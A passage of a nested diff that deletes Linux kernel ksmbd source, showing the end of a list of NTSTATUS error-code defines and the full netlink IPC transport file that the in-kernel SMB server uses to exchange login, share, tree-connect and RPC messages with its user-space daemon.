+-#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
+-#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
+-#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
+-#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
+-#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
+-#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
+-#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
+-#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
+-#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
+-#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
+-#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
+-#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
+-#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
+-#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
+-#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
+-#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
+-#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
+-#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
+-#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
+-#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
+-#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
+-#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
+-#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
+-#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
+-#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
+-#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
+-#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
+-#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
+-#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
+-#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
+-#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
+-#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
+-#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
+-#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
+-#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
+-#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
+-#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
+-#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
+-#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
+-#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
+-#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
+-#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
+-#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
+-#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
+-#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
+-#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
+-#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
+-#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
+-#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
+-#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
+-#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
+-#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
+-#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
+-#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
+-#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
+-#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
+-#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
+-#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
+-#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
+-#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
+-#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
+-#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
+-#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
+-#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
+-#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
+-#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
+-#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
+-#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
+-#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
+-#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
+-#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
+-
+-#define STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP cpu_to_le32(0xC05D0000)
+-#define STATUS_INVALID_LOCK_RANGE cpu_to_le32(0xC00001a1)
+diff --git a/fs/ksmbd/transport_ipc.c b/fs/ksmbd/transport_ipc.c
+deleted file mode 100644
+index 40c721f9227e4..0000000000000
+--- a/fs/ksmbd/transport_ipc.c
++++ /dev/null
+@@ -1,884 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/jhash.h>
+-#include <linux/slab.h>
+-#include <linux/rwsem.h>
+-#include <linux/mutex.h>
+-#include <linux/wait.h>
+-#include <linux/hashtable.h>
+-#include <net/net_namespace.h>
+-#include <net/genetlink.h>
+-#include <linux/socket.h>
+-#include <linux/workqueue.h>
+-
+-#include "vfs_cache.h"
+-#include "transport_ipc.h"
+-#include "server.h"
+-#include "smb_common.h"
+-
+-#include "mgmt/user_config.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/ksmbd_ida.h"
+-#include "connection.h"
+-#include "transport_tcp.h"
+-#include "transport_rdma.h"
+-
+-#define IPC_WAIT_TIMEOUT	(2 * HZ)
+-
+-#define IPC_MSG_HASH_BITS	3
+-static DEFINE_HASHTABLE(ipc_msg_table, IPC_MSG_HASH_BITS);
+-static DECLARE_RWSEM(ipc_msg_table_lock);
+-static DEFINE_MUTEX(startup_lock);
+-
+-static DEFINE_IDA(ipc_ida);
+-
+-static unsigned int ksmbd_tools_pid;
+-
+-static bool ksmbd_ipc_validate_version(struct genl_info *m)
+-{
+-	if (m->genlhdr->version != KSMBD_GENL_VERSION) {
+-		pr_err("%s. ksmbd: %d, kernel module: %d. %s.\n",
+-		       "Daemon and kernel module version mismatch",
+-		       m->genlhdr->version,
+-		       KSMBD_GENL_VERSION,
+-		       "User-space ksmbd should terminate");
+-		return false;
+-	}
+-	return true;
+-}
+-
+-struct ksmbd_ipc_msg {
+-	unsigned int		type;
+-	unsigned int		sz;
+-	unsigned char		payload[];
+-};
+-
+-struct ipc_msg_table_entry {
+-	unsigned int		handle;
+-	unsigned int		type;
+-	wait_queue_head_t	wait;
+-	struct hlist_node	ipc_table_hlist;
+-
+-	void			*response;
+-};
+-
+-static struct delayed_work ipc_timer_work;
+-
+-static int handle_startup_event(struct sk_buff *skb, struct genl_info *info);
+-static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info);
+-static int handle_generic_event(struct sk_buff *skb, struct genl_info *info);
+-static int ksmbd_ipc_heartbeat_request(void);
+-
+-static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX] = {
+-	[KSMBD_EVENT_UNSPEC] = {
+-		.len = 0,
+-	},
+-	[KSMBD_EVENT_HEARTBEAT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_heartbeat),
+-	},
+-	[KSMBD_EVENT_STARTING_UP] = {
+-		.len = sizeof(struct ksmbd_startup_request),
+-	},
+-	[KSMBD_EVENT_SHUTTING_DOWN] = {
+-		.len = sizeof(struct ksmbd_shutdown_request),
+-	},
+-	[KSMBD_EVENT_LOGIN_REQUEST] = {
+-		.len = sizeof(struct ksmbd_login_request),
+-	},
+-	[KSMBD_EVENT_LOGIN_RESPONSE] = {
+-		.len = sizeof(struct ksmbd_login_response),
+-	},
+-	[KSMBD_EVENT_SHARE_CONFIG_REQUEST] = {
+-		.len = sizeof(struct ksmbd_share_config_request),
+-	},
+-	[KSMBD_EVENT_SHARE_CONFIG_RESPONSE] = {
+-		.len = sizeof(struct ksmbd_share_config_response),
+-	},
+-	[KSMBD_EVENT_TREE_CONNECT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_tree_connect_request),
+-	},
+-	[KSMBD_EVENT_TREE_CONNECT_RESPONSE] = {
+-		.len = sizeof(struct ksmbd_tree_connect_response),
+-	},
+-	[KSMBD_EVENT_TREE_DISCONNECT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_tree_disconnect_request),
+-	},
+-	[KSMBD_EVENT_LOGOUT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_logout_request),
+-	},
+-	[KSMBD_EVENT_RPC_REQUEST] = {
+-	},
+-	[KSMBD_EVENT_RPC_RESPONSE] = {
+-	},
+-	[KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST] = {
+-	},
+-	[KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE] = {
+-	},
+-};
+-
+-static struct genl_ops ksmbd_genl_ops[] = {
+-	{
+-		.cmd	= KSMBD_EVENT_UNSPEC,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_HEARTBEAT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_STARTING_UP,
+-		.doit	= handle_startup_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SHUTTING_DOWN,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_LOGIN_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_LOGIN_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SHARE_CONFIG_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_TREE_CONNECT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_TREE_CONNECT_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_TREE_DISCONNECT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_LOGOUT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_RPC_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_RPC_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-};
+-
+-static struct genl_family ksmbd_genl_family = {
+-	.name		= KSMBD_GENL_NAME,
+-	.version	= KSMBD_GENL_VERSION,
+-	.hdrsize	= 0,
+-	.maxattr	= KSMBD_EVENT_MAX,
+-	.netnsok	= true,
+-	.module		= THIS_MODULE,
+-	.ops		= ksmbd_genl_ops,
+-	.n_ops		= ARRAY_SIZE(ksmbd_genl_ops),
+-	.resv_start_op	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE + 1,
+-};
+-
+-static void ksmbd_nl_init_fixup(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(ksmbd_genl_ops); i++)
+-		ksmbd_genl_ops[i].validate = GENL_DONT_VALIDATE_STRICT |
+-						GENL_DONT_VALIDATE_DUMP;
+-
+-	ksmbd_genl_family.policy = ksmbd_nl_policy;
+-}
+-
+-static int rpc_context_flags(struct ksmbd_session *sess)
+-{
+-	if (user_guest(sess->user))
+-		return KSMBD_RPC_RESTRICTED_CONTEXT;
+-	return 0;
+-}
+-
+-static void ipc_update_last_active(void)
+-{
+-	if (server_conf.ipc_timeout)
+-		server_conf.ipc_last_active = jiffies;
+-}
+-
+-static struct ksmbd_ipc_msg *ipc_msg_alloc(size_t sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	size_t msg_sz = sz + sizeof(struct ksmbd_ipc_msg);
+-
+-	msg = kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO);
+-	if (msg)
+-		msg->sz = sz;
+-	return msg;
+-}
+-
+-static void ipc_msg_free(struct ksmbd_ipc_msg *msg)
+-{
+-	kvfree(msg);
+-}
+-
+-static void ipc_msg_handle_free(int handle)
+-{
+-	if (handle >= 0)
+-		ksmbd_release_id(&ipc_ida, handle);
+-}
+-
+-static int handle_response(int type, void *payload, size_t sz)
+-{
+-	unsigned int handle = *(unsigned int *)payload;
+-	struct ipc_msg_table_entry *entry;
+-	int ret = 0;
+-
+-	ipc_update_last_active();
+-	down_read(&ipc_msg_table_lock);
+-	hash_for_each_possible(ipc_msg_table, entry, ipc_table_hlist, handle) {
+-		if (handle != entry->handle)
+-			continue;
+-
+-		entry->response = NULL;
+-		/*
+-		 * Response message type value should be equal to
+-		 * request message type + 1.
+-		 */
+-		if (entry->type + 1 != type) {
+-			pr_err("Waiting for IPC type %d, got %d. Ignore.\n",
+-			       entry->type + 1, type);
+-		}
+-
+-		entry->response = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
+-		if (!entry->response) {
+-			ret = -ENOMEM;
+-			break;
+-		}
+-
+-		memcpy(entry->response, payload, sz);
+-		wake_up_interruptible(&entry->wait);
+-		ret = 0;
+-		break;
+-	}
+-	up_read(&ipc_msg_table_lock);
+-
+-	return ret;
+-}
+-
+-static int ipc_server_config_on_startup(struct ksmbd_startup_request *req)
+-{
+-	int ret;
+-
+-	ksmbd_set_fd_limit(req->file_max);
+-	server_conf.flags = req->flags;
+-	server_conf.signing = req->signing;
+-	server_conf.tcp_port = req->tcp_port;
+-	server_conf.ipc_timeout = req->ipc_timeout * HZ;
+-	server_conf.deadtime = req->deadtime * SMB_ECHO_INTERVAL;
+-	server_conf.share_fake_fscaps = req->share_fake_fscaps;
+-	ksmbd_init_domain(req->sub_auth);
+-
+-	if (req->smb2_max_read)
+-		init_smb2_max_read_size(req->smb2_max_read);
+-	if (req->smb2_max_write)
+-		init_smb2_max_write_size(req->smb2_max_write);
+-	if (req->smb2_max_trans)
+-		init_smb2_max_trans_size(req->smb2_max_trans);
+-	if (req->smb2_max_credits)
+-		init_smb2_max_credits(req->smb2_max_credits);
+-	if (req->smbd_max_io_size)
+-		init_smbd_max_io_size(req->smbd_max_io_size);
+-
+-	if (req->max_connections)
+-		server_conf.max_connections = req->max_connections;
+-
+-	ret = ksmbd_set_netbios_name(req->netbios_name);
+-	ret |= ksmbd_set_server_string(req->server_string);
+-	ret |= ksmbd_set_work_group(req->work_group);
+-	ret |= ksmbd_tcp_set_interfaces(KSMBD_STARTUP_CONFIG_INTERFACES(req),
+-					req->ifc_list_sz);
+-	if (ret) {
+-		pr_err("Server configuration error: %s %s %s\n",
+-		       req->netbios_name, req->server_string,
+-		       req->work_group);
+-		return ret;
+-	}
+-
+-	if (req->min_prot[0]) {
+-		ret = ksmbd_lookup_protocol_idx(req->min_prot);
+-		if (ret >= 0)
+-			server_conf.min_protocol = ret;
+-	}
+-	if (req->max_prot[0]) {
+-		ret = ksmbd_lookup_protocol_idx(req->max_prot);
+-		if (ret >= 0)
+-			server_conf.max_protocol = ret;
+-	}
+-
+-	if (server_conf.ipc_timeout)
+-		schedule_delayed_work(&ipc_timer_work, server_conf.ipc_timeout);
+-	return 0;
+-}
+-
+-static int handle_startup_event(struct sk_buff *skb, struct genl_info *info)
+-{
+-	int ret = 0;
+-
+-#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
+-	if (!netlink_capable(skb, CAP_NET_ADMIN))
+-		return -EPERM;
+-#endif
+-
+-	if (!ksmbd_ipc_validate_version(info))
+-		return -EINVAL;
+-
+-	if (!info->attrs[KSMBD_EVENT_STARTING_UP])
+-		return -EINVAL;
+-
+-	mutex_lock(&startup_lock);
+-	if (!ksmbd_server_configurable()) {
+-		mutex_unlock(&startup_lock);
+-		pr_err("Server reset is in progress, can't start daemon\n");
+-		return -EINVAL;
+-	}
+-
+-	if (ksmbd_tools_pid) {
+-		if (ksmbd_ipc_heartbeat_request() == 0) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		pr_err("Reconnect to a new user space daemon\n");
+-	} else {
+-		struct ksmbd_startup_request *req;
+-
+-		req = nla_data(info->attrs[info->genlhdr->cmd]);
+-		ret = ipc_server_config_on_startup(req);
+-		if (ret)
+-			goto out;
+-		server_queue_ctrl_init_work();
+-	}
+-
+-	ksmbd_tools_pid = info->snd_portid;
+-	ipc_update_last_active();
+-
+-out:
+-	mutex_unlock(&startup_lock);
+-	return ret;
+-}
+-
+-static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info)
+-{
+-	pr_err("Unknown IPC event: %d, ignore.\n", info->genlhdr->cmd);
+-	return -EINVAL;
+-}
+-
+-static int handle_generic_event(struct sk_buff *skb, struct genl_info *info)
+-{
+-	void *payload;
+-	int sz;
+-	int type = info->genlhdr->cmd;
+-
+-#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
+-	if (!netlink_capable(skb, CAP_NET_ADMIN))
+-		return -EPERM;
+-#endif
+-
+-	if (type >= KSMBD_EVENT_MAX) {
+-		WARN_ON(1);
+-		return -EINVAL;
+-	}
+-
+-	if (!ksmbd_ipc_validate_version(info))
+-		return -EINVAL;
+-
+-	if (!info->attrs[type])
+-		return -EINVAL;
+-
+-	payload = nla_data(info->attrs[info->genlhdr->cmd]);
+-	sz = nla_len(info->attrs[info->genlhdr->cmd]);
+-	return handle_response(type, payload, sz);
+-}
+-
+-static int ipc_msg_send(struct ksmbd_ipc_msg *msg)
+-{
+-	struct genlmsghdr *nlh;
+-	struct sk_buff *skb;
+-	int ret = -EINVAL;
+-
+-	if (!ksmbd_tools_pid)
+-		return ret;
+-
+-	skb = genlmsg_new(msg->sz, GFP_KERNEL);
+-	if (!skb)
+-		return -ENOMEM;
+-
+-	nlh = genlmsg_put(skb, 0, 0, &ksmbd_genl_family, 0, msg->type);
+-	if (!nlh)
+-		goto out;
+-
+-	ret = nla_put(skb, msg->type, msg->sz, msg->payload);
+-	if (ret) {
+-		genlmsg_cancel(skb, nlh);
+-		goto out;
+-	}
+-
+-	genlmsg_end(skb, nlh);
+-	ret = genlmsg_unicast(&init_net, skb, ksmbd_tools_pid);
+-	if (!ret)
+-		ipc_update_last_active();
+-	return ret;
+-
+-out:
+-	nlmsg_free(skb);
+-	return ret;
+-}
+-
+-static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle)
+-{
+-	struct ipc_msg_table_entry entry;
+-	int ret;
+-
+-	if ((int)handle < 0)
+-		return NULL;
+-
+-	entry.type = msg->type;
+-	entry.response = NULL;
+-	init_waitqueue_head(&entry.wait);
+-
+-	down_write(&ipc_msg_table_lock);
+-	entry.handle = handle;
+-	hash_add(ipc_msg_table, &entry.ipc_table_hlist, entry.handle);
+-	up_write(&ipc_msg_table_lock);
+-
+-	ret = ipc_msg_send(msg);
+-	if (ret)
+-		goto out;
+-
+-	ret = wait_event_interruptible_timeout(entry.wait,
+-					       entry.response != NULL,
+-					       IPC_WAIT_TIMEOUT);
+-out:
+-	down_write(&ipc_msg_table_lock);
+-	hash_del(&entry.ipc_table_hlist);
+-	up_write(&ipc_msg_table_lock);
+-	return entry.response;
+-}
+-
+-static int ksmbd_ipc_heartbeat_request(void)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	int ret;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_heartbeat));
+-	if (!msg)
+-		return -EINVAL;
+-
+-	msg->type = KSMBD_EVENT_HEARTBEAT_REQUEST;
+-	ret = ipc_msg_send(msg);
+-	ipc_msg_free(msg);
+-	return ret;
+-}
+-
+-struct ksmbd_login_response *ksmbd_ipc_login_request(const char *account)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_login_request *req;
+-	struct ksmbd_login_response *resp;
+-
+-	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
+-		return NULL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_login_request));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_LOGIN_REQUEST;
+-	req = (struct ksmbd_login_request *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_spnego_authen_response *
+-ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_spnego_authen_request *req;
+-	struct ksmbd_spnego_authen_response *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_spnego_authen_request) +
+-			blob_len + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST;
+-	req = (struct ksmbd_spnego_authen_request *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	req->spnego_blob_len = blob_len;
+-	memcpy(req->spnego_blob, spnego_blob, blob_len);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_tree_connect_response *
+-ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
+-			       struct ksmbd_share_config *share,
+-			       struct ksmbd_tree_connect *tree_conn,
+-			       struct sockaddr *peer_addr)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_tree_connect_request *req;
+-	struct ksmbd_tree_connect_response *resp;
+-
+-	if (strlen(user_name(sess->user)) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
+-		return NULL;
+-
+-	if (strlen(share->name) >= KSMBD_REQ_MAX_SHARE_NAME)
+-		return NULL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_connect_request));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_TREE_CONNECT_REQUEST;
+-	req = (struct ksmbd_tree_connect_request *)msg->payload;
+-
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	req->account_flags = sess->user->flags;
+-	req->session_id = sess->id;
+-	req->connect_id = tree_conn->id;
+-	strscpy(req->account, user_name(sess->user), KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
+-	strscpy(req->share, share->name, KSMBD_REQ_MAX_SHARE_NAME);
+-	snprintf(req->peer_addr, sizeof(req->peer_addr), "%pIS", peer_addr);
+-
+-	if (peer_addr->sa_family == AF_INET6)
+-		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_IPV6;
+-	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
+-		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_SMB2;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
+-				      unsigned long long connect_id)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_tree_disconnect_request *req;
+-	int ret;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_disconnect_request));
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	msg->type = KSMBD_EVENT_TREE_DISCONNECT_REQUEST;
+-	req = (struct ksmbd_tree_disconnect_request *)msg->payload;
+-	req->session_id = session_id;
+-	req->connect_id = connect_id;
+-
+-	ret = ipc_msg_send(msg);
+-	ipc_msg_free(msg);
+-	return ret;
+-}
+-
+-int ksmbd_ipc_logout_request(const char *account, int flags)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_logout_request *req;
+-	int ret;
+-
+-	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
+-		return -EINVAL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_logout_request));
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	msg->type = KSMBD_EVENT_LOGOUT_REQUEST;
+-	req = (struct ksmbd_logout_request *)msg->payload;
+-	req->account_flags = flags;
+-	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
+-
+-	ret = ipc_msg_send(msg);
+-	ipc_msg_free(msg);
+-	return ret;
+-}
+-
+-struct ksmbd_share_config_response *
+-ksmbd_ipc_share_config_request(const char *name)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_share_config_request *req;
+-	struct ksmbd_share_config_response *resp;
+-
+-	if (strlen(name) >= KSMBD_REQ_MAX_SHARE_NAME)
+-		return NULL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_share_config_request));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_SHARE_CONFIG_REQUEST;
+-	req = (struct ksmbd_share_config_request *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	strscpy(req->share_name, name, KSMBD_REQ_MAX_SHARE_NAME);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= KSMBD_RPC_OPEN_METHOD;
+-	req->payload_sz = 0;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= KSMBD_RPC_CLOSE_METHOD;
+-	req->payload_sz = 0;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
